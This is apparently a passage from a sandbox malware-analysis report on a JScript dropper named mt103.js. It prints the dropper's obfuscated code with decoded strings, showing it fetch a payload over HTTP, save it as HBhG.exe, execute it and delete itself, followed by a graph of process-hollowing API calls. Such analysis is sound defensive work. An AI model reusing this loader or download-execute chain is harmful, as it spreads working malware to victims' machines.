                                                                                                                                                                                                                                                    140
                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                      141
                                                                                                                                                                                                                                                      for ( _0x52bcce = 0x0 ; _0x52bcce < 0x100 ; _0x52bcce ++ )
                                                                                                                                                                                                                                                        142
                                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                                          143
                                                                                                                                                                                                                                                          _0x10d7d2 = ( _0x10d7d2 + _0x596c54[_0x52bcce] + _0x300c1d['charCodeAt'] ( _0x52bcce % _0x300c1d['length'] ) ) % 0x100, _0x30b5e5 = _0x596c54[_0x52bcce], _0x596c54[_0x52bcce] = _0x596c54[_0x10d7d2], _0x596c54[_0x10d7d2] = _0x30b5e5;
                                                                                                                                                                                                                                                            144
                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                              145
                                                                                                                                                                                                                                                              _0x52bcce = 0x0, _0x10d7d2 = 0x0;
                                                                                                                                                                                                                                                                146
                                                                                                                                                                                                                                                                for ( var _0x14d4ef = 0x0 ; _0x14d4ef < _0x4146f5['length'] ; _0x14d4ef ++ )
                                                                                                                                                                                                                                                                  147
                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                    148
                                                                                                                                                                                                                                                                    _0x52bcce = ( _0x52bcce + 0x1 ) % 0x100, _0x10d7d2 = ( _0x10d7d2 + _0x596c54[_0x52bcce] ) % 0x100, _0x30b5e5 = _0x596c54[_0x52bcce], _0x596c54[_0x52bcce] = _0x596c54[_0x10d7d2], _0x596c54[_0x10d7d2] = _0x30b5e5, _0x5ab42e += String['fromCharCode'] ( _0x4146f5['charCodeAt'] ( _0x14d4ef ) ^ _0x596c54[( _0x596c54[_0x52bcce] + _0x596c54[_0x10d7d2] ) % 0x100] );
                                                                                                                                                                                                                                                                      149
                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                        150
                                                                                                                                                                                                                                                                        return _0x5ab42e;
                                                                                                                                                                                                                                                                          151
                                                                                                                                                                                                                                                                          };
                                                                                                                                                                                                                                                                            152
                                                                                                                                                                                                                                                                            _0x4692['cPJhTe'] = _0x469280, _0x5bb6db = arguments, _0x4692['sBWqCU'] = ! ! [];
                                                                                                                                                                                                                                                                              153
                                                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                                                                154
                                                                                                                                                                                                                                                                                var _0x56f1f3 = _0x2a78ae[0x0], _0x13aba2 = _0x4251a9 + _0x56f1f3, _0x88d5ba = _0x5bb6db[_0x13aba2];
                                                                                                                                                                                                                                                                                  155
                                                                                                                                                                                                                                                                                  return ! _0x88d5ba ? ( _0x4692['QrcbMc'] === undefined && ( _0x4692['QrcbMc'] = ! ! [] ), _0x117c39 = _0x4692['cPJhTe'] ( _0x117c39, _0xdf85fb ), _0x5bb6db[_0x13aba2] = _0x117c39 ) : _0x117c39 = _0x88d5ba, _0x117c39;
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa","Ak^H") ➔ "t\x9b\x9dK h\xe8F.O\x1b\x14\xf9f]A\xf3~\xfe\xdd\xeb\x93\xac$"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm","#k&M") ➔ "7\x11ov\x15\x8c\xf9\xf9#\xe5 \xc9{\x91\x14 Y5k\xb9\x8d\xc9\xbeW\xc3\xb4\xb5\xa45cY>3\xac"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("W7lcNYddGYNdT8kiorm2WOJdSa","Ak^H") ➔ "139783InEZVB"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("kmoTW4ztcXLxhCoX","#k&M") ➔ "460SvEvgK"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq","4j$p") ➔ "WO41qK7cRvBcISoBWQBcVJxcMW"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("EmosWRVcNSolFa1ihmofWPhcNa","A]GT") ➔ "536561IZdlNV"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu","R8Tp") ➔ "ScriptFullName"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44","6cTY") ➔ "WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm","*zp8") ➔ "o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("hXuIWQxcSSkWm8khW5/dHCkY","fXty") ➔ "32292SPYXOk"
                                                                                                                                                                                                                                                                                  156
                                                                                                                                                                                                                                                                                  }, _0x4692 ( _0x5bb6db, _0x386215 );
                                                                                                                                                                                                                                                                                    157
                                                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                                                      158
                                                                                                                                                                                                                                                                                      var Stream = WScript[_0x296948 ( 0x1a8, '8dC3' ) ] ( _0x296948 ( 0x187, '8j7d' ) );
                                                                                                                                                                                                                                                                                      • _0x296948(424,"8dC3") ➔ "CreateObject"
                                                                                                                                                                                                                                                                                      • _0x296948(391,"8j7d") ➔ "ADODB.Stream"
                                                                                                                                                                                                                                                                                      • Windows Script Host.CreateObject("ADODB.Stream") ➔
                                                                                                                                                                                                                                                                                      159
                                                                                                                                                                                                                                                                                      function _0x1523() {
                                                                                                                                                                                                                                                                                      • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                                                                                                                                                                                                                      160
                                                                                                                                                                                                                                                                                      var _0xd71e86 = _0x25c5ce, _0x3a2755 = _0x296948, _0x21e936 = [ _0x3a2755 ( 0x195, '4j$p' ), _0x3a2755 ( 0x170, 'A]GT' ), _0x3a2755 ( 0x172, 'R8Tp' ), _0xd71e86 ( 0x19a ), _0xd71e86 ( 0x1ac ), '24cwPSlC', 'W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW', _0xd71e86 ( 0x186 ), 'Close', _0x3a2755 ( 0x176, '6cTY' ), _0x3a2755 ( 0x18e, '*zp8' ), _0x3a2755 ( 0x17c, 'fXty' ), _0x3a2755 ( 0x178, '6cTY' ), _0xd71e86 ( 0x17f ), _0x3a2755 ( 0x1a4, 'n0v!' ), _0xd71e86 ( 0x173 ), 'gCk/WPVdMa', _0x3a2755 ( 0x180, 'TMp!' ), _0xd71e86 ( 0x19c ), _0xd71e86 ( 0x194 ), 'C8kCWRBcQmoRqSk/DNe', _0x3a2755 ( 0x196, 'RAu]' ), _0x3a2755 ( 0x17e, 'R8Tp' ), _0xd71e86 ( 0x17d ), 'bmkMWPFcTmkPkLaJ', _0xd71e86 ( 0x184 ), 'Shell.Application' ];
                                                                                                                                                                                                                                                                                      • _0x4692(405,"4j$p") ➔ "WO41qK7cRvBcISoBWQBcVJxcMW"
                                                                                                                                                                                                                                                                                      • _0x4692(368,"A]GT") ➔ "536561IZdlNV"
                                                                                                                                                                                                                                                                                      • _0x4692(370,"R8Tp") ➔ "ScriptFullName"
                                                                                                                                                                                                                                                                                      • _0xd71e86(410) ➔ "F8kIdw8uWQKJssddISkJW51zcW"
                                                                                                                                                                                                                                                                                      • _0xd71e86(428) ➔ "W5S9W7KHWQtdJMhdSGpcIKnHWPun"
                                                                                                                                                                                                                                                                                      • _0xd71e86(390) ➔ "hSkNWP3dMdulzwhcT0e"
                                                                                                                                                                                                                                                                                      • _0x4692(374,"6cTY") ➔ "WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48"
                                                                                                                                                                                                                                                                                      • _0x4692(398,"*zp8") ➔ "o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa"
                                                                                                                                                                                                                                                                                      • _0x4692(380,"fXty") ➔ "32292SPYXOk"
                                                                                                                                                                                                                                                                                      • _0x3a2755(376,"6cTY") ➔ "1309896lcehgL"
                                                                                                                                                                                                                                                                                      • _0xd71e86(383) ➔ "WP/cHWdcICk+W6CiFCoVWRWwjG"
                                                                                                                                                                                                                                                                                      • _0x3a2755(420,"n0v!") ➔ "934406fwGgPc"
                                                                                                                                                                                                                                                                                      • _0xd71e86(371) ➔ "3428070zJPwOJ"
                                                                                                                                                                                                                                                                                      • _0x3a2755(384,"TMp!") ➔ "W7BdICoxwmo0W5TdySkoWPGi"
                                                                                                                                                                                                                                                                                      • _0xd71e86(412) ➔ "WRxcISkFh8o1z8oeC8k8hq"
                                                                                                                                                                                                                                                                                      • _0xd71e86(404) ➔ "ShellExecute"
                                                                                                                                                                                                                                                                                      • _0x3a2755(406,"RAu]") ➔ "aLBcSv8UWRldTmkhoColW54Z"
                                                                                                                                                                                                                                                                                      • _0x3a2755(382,"R8Tp") ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                                                      • _0xd71e86(381) ➔ "7728888BzvkvV"
                                                                                                                                                                                                                                                                                      • _0xd71e86(388) ➔ "WRCRf8oCW5a"
                                                                                                                                                                                                                                                                                      161
                                                                                                                                                                                                                                                                                      return _0x1523 =
                                                                                                                                                                                                                                                                                        162
                                                                                                                                                                                                                                                                                        function () {
                                                                                                                                                                                                                                                                                        • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                                                                                                                                                                                                                        • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                                                                                                                                                                                                                        • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                                                                                                                                                                                                                        • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                                                                                                                                                                                                                        • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                                                                                                                                                                                                                        • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                                                                                                                                                                                                                        • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                                                                                                                                                                                                                        • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                                                                                                                                                                                                                        • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                                                                                                                                                                                                                        • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                                                                                                                                                                                                                        163
                                                                                                                                                                                                                                                                                        return _0x21e936;
                                                                                                                                                                                                                                                                                          164
                                                                                                                                                                                                                                                                                          }, _0x1523 ( );
                                                                                                                                                                                                                                                                                            165
                                                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                                                              166
                                                                                                                                                                                                                                                                                              Stream[_0x25c5ce ( 0x1ab ) ] ( ), Stream[_0x2bbb97 ( 0x107, _0x25c5ce ( 0x182 ) ) ] = 0x1, Stream[_0x2bbb97 ( 0x110, _0x25c5ce ( 0x1b0 ) ) ] ( Object[_0x2bbb97 ( 0x104, _0x25c5ce ( 0x1a9 ) ) ] ), Stream[_0x2bbb97 ( 0x10f, _0x296948 ( 0x1a0, '&eII' ) ) ] = 0x0, Stream[_0x2bbb97 ( 0xfe, _0x25c5ce ( 0x182 ) ) ] ( pOut, 0x2 ), Stream[_0x106d34 ( 0xff ) ] ( ), new ActiveXObject ( _0x106d34 ( 0x111 ) ) [_0x106d34 ( 0x10a ) ] ( pOut, '', '', _0x25c5ce ( 0x17a ), '1' ), new ActiveXObject ( _0x2bbb97 ( 0x100, _0x296948 ( 0x190, '[ZA9' ) ) ) [_0x2bbb97 ( 0x109, _0x25c5ce ( 0x183 ) ) ] ( WScript[_0x106d34 ( 0x114 ) ] );
                                                                                                                                                                                                                                                                                              • _0x25c5ce(427) ➔ "Open"
                                                                                                                                                                                                                                                                                              • Open() ➔ undefined
                                                                                                                                                                                                                                                                                              • _0x25c5ce(386) ➔ "SC!i"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(263,"SC!i") ➔ "Type"
                                                                                                                                                                                                                                                                                              • _0x25c5ce(432) ➔ "AR2w"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(272,"AR2w") ➔ "Write"
                                                                                                                                                                                                                                                                                              • _0x25c5ce(425) ➔ "p3(5"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(260,"p3(5") ➔ "ResponseBody"
                                                                                                                                                                                                                                                                                              • Write() ➔ undefined
                                                                                                                                                                                                                                                                                              • _0x296948(416,"&eII") ➔ "@ZCL"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(271,"@ZCL") ➔ "Position"
                                                                                                                                                                                                                                                                                              • _0x25c5ce(386) ➔ "SC!i"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(254,"SC!i") ➔ "SaveToFile"
                                                                                                                                                                                                                                                                                              • SaveToFile("C:\Users\engineer\AppData\Local\Temp\HBhG.exe",2) ➔ undefined
                                                                                                                                                                                                                                                                                              • _0x106d34(255) ➔ "Close"
                                                                                                                                                                                                                                                                                              • Close() ➔ undefined
                                                                                                                                                                                                                                                                                              • _0x106d34(273) ➔ "Shell.Application"
                                                                                                                                                                                                                                                                                              • _0x106d34(266) ➔ "ShellExecute"
                                                                                                                                                                                                                                                                                              • _0x25c5ce(378) ➔ "open"
                                                                                                                                                                                                                                                                                              • ShellExecute("C:\Users\engineer\AppData\Local\Temp\HBhG.exe","","","open","1") ➔ undefined
                                                                                                                                                                                                                                                                                              • _0x296948(400,"[ZA9") ➔ "t[E2"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(256,"t[E2") ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                                                              • _0x25c5ce(387) ➔ "XaOX"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(265,"XaOX") ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                              • _0x106d34(276) ➔ "ScriptFullName"
                                                                                                                                                                                                                                                                                              • DeleteFile("C:\Users\engineer\Desktop\mt103.js") ➔ undefined
                                                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:14.4%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                                                Total number of Nodes:81
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:5
                                                                                                                                                                                                                                                                                                execution_graph 3960 2a27da2 3969 2a276e0 3960->3969 3973 2a276d5 3960->3973 3970 2a27767 CreateProcessA 3969->3970 3972 2a279bc 3970->3972 3974 2a27767 CreateProcessA 3973->3974 3976 2a279bc 3974->3976 3994 2a28965 3995 2a2896d 3994->3995 3997 2a26f50 WriteProcessMemory 3995->3997 3998 2a26f48 WriteProcessMemory 3995->3998 3996 2a289a3 3997->3996 3998->3996 3999 2a287ea 4000 2a287ef 3999->4000 4001 2a27ead 4000->4001 4007 2a26f50 WriteProcessMemory 4000->4007 4008 2a26f48 WriteProcessMemory 4000->4008 4002 2a28af6 4001->4002 4003 2a26e30 VirtualAllocEx 4001->4003 4004 2a26e29 VirtualAllocEx 4001->4004 4005 2a26be1 ResumeThread 4001->4005 4006 2a26be8 ResumeThread 4001->4006 4003->4001 4004->4001 4005->4001 4006->4001 4007->4001 4008->4001 4016 2a28a6f 4019 2a26d00 SetThreadContext 4016->4019 4020 2a26d08 SetThreadContext 4016->4020 4017 2a28ad0 4018 2a27ead 4018->4017 4021 2a26be1 ResumeThread 4018->4021 4022 2a26be8 ResumeThread 4018->4022 4023 2a26e30 VirtualAllocEx 4018->4023 4024 2a26e29 VirtualAllocEx 4018->4024 4019->4018 4020->4018 4021->4018 4022->4018 4023->4018 4024->4018 4065 2a27e34 4066 2a27e41 4065->4066 4067 2a28af6 4066->4067 4068 2a26be1 ResumeThread 4066->4068 4069 2a26be8 ResumeThread 4066->4069 4070 2a26e30 VirtualAllocEx 4066->4070 4071 2a26e29 VirtualAllocEx 4066->4071 4068->4066 4069->4066 4070->4066 4071->4066 3926 2a28302 3927 2a2830b 3926->3927 3936 2a26f50 3927->3936 3940 2a26f48 3927->3940 3928 2a27ead 3929 2a28730 3928->3929 3944 2a26be8 3928->3944 3948 2a26be1 3928->3948 3952 2a26e30 3928->3952 3956 2a26e29 3928->3956 3937 2a26f9c WriteProcessMemory 3936->3937 3939 2a27035 3937->3939 3939->3928 3941 2a26f50 WriteProcessMemory 3940->3941 3943 2a27035 3941->3943 3943->3928 3945 2a26c2c ResumeThread 3944->3945 3947 2a26c78 3945->3947 3947->3928 3949 2a26be8 ResumeThread 3948->3949 3951 2a26c78 3949->3951 3951->3928 3953 2a26e74 VirtualAllocEx 3952->3953 3955 2a26eec 3953->3955 3955->3928 3957 2a26e30 VirtualAllocEx 3956->3957 3959 2a26eec 3957->3959 3959->3928 3977 2a28185 3986 2a26d00 3977->3986 3990 2a26d08 3977->3990 3978 2a27ead 3979 2a28af6 3978->3979 3980 2a26e30 VirtualAllocEx 3978->3980 3981 2a26e29 VirtualAllocEx 3978->3981 3984 2a26be1 ResumeThread 3978->3984 3985 2a26be8 ResumeThread 3978->3985 3980->3978 3981->3978 3984->3978 3985->3978 3987 2a26d08 SetThreadContext 3986->3987 3989 2a26dc9 3987->3989 3989->3978 3991 2a26d51 SetThreadContext 3990->3991 3993 2a26dc9 3991->3993 3993->3978 4025 2a284d0 4029 2a270a1 4025->4029 4033 2a270a8 4025->4033 4026 2a284f2 4030 2a270a8 ReadProcessMemory 4029->4030 4032 2a2716c 4030->4032 4032->4026 4034 2a270f4 ReadProcessMemory 4033->4034 4036 2a2716c 4034->4036 4036->4026

                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                Function 02A276D5 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02A279A7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
